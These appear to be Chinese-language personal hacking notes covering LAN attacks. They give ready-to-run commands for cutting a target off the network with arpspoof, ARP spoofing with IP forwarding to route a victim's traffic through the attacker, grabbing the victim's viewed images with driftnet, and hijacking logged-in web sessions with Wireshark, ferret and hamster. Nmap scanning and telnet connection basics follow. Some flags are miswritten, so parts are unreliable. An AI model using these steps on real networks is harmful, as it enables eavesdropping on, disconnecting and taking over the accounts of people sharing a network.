######局域网断网攻击
fping -asg 192.168.1.0/24 ##扫描0网段所有能ping通的ip
nmap -Ss 192.168.1.141 ##扫描141主机打开的端口
arp攻击
arpspoof -i 自己的网卡 -t 目标IP 目标网关
例如:arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
######局域网arp欺骗
目标的IP流量经过我的网卡,从网关出去
首先,进行IP流量转发
echo 1 >/proc/sys/net/ipv4/ip_forward (echo写命令,是不会有回显的)
再进行arpspoof命令
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
此时目标的流量将会经过我的网卡,就成为了arp欺骗
driftnet ##获取本机网卡的图片
因为目标的流量此时经过我的网卡,所以我获取本机网卡图片=获得目标所浏览图片
#######会话劫持——登陆别人登录过的网站
所用软件:
wireshark ##抓包
ferret ##重新生成抓包后的文件
hamster ##重放流量
首先对目标进行arp欺骗,然后用wireshark进行抓包
当目标登陆了某些网站时,wireshark上会显示很多DNS的信息
此时停止抓包,将文件保存为pcap格式,关闭wireshark,
进入保存文件的目录,使用ferret -r 文件名 命令,生成一个.txt的文件,此时执行hamster命令,会生成一些信息(127.0.0.1:1234)
意思是把代理改为127.0.0.1的1234端口
然后在浏览器输入127.0.0.1:1234即可看到一个ip,点击后进入,有很多地址,在其中找到我们需要的即可
第二种方法:
不用欺骗了
ferret -i eth0
另开一个标签
hamster
改代理端口,同上
Nmap基础学习
nmap 192.168.1.102 扫描此ip地址开放的所有端口
也支持多个ip同时扫描
nmap 192.168.1.102 192.168.8.223
或在同一个子网下:nmap 192.168.1.102,24,171 同时扫描3个ip地址
也可以将需要扫描的ip地址存在一个文件里,通过nmap -iL filename 扫描文件里所有的ip
随机扫描:nmap -iR 3 随机扫描3个ip(我也没搞清楚是什么里的3个)
排除某些ip扫描:如:nmap 10.73.26.0/24 --exclude 10.73.26.183-190 (扫描所有ip除了183到190)
nmap 10.73.26.0/24 --excludefile file.txt (扫描所有ip除了file.txt里的ip)
扫描开放网络端口:
nmap -o 识别远程操作系统
-sC 运行默认的脚本扫描
-A 10.73.31.64
可以在扫描出端口后,若有23端口telnet开放,可以使用netcat进行远程连接:
命令:nc ipaddress 23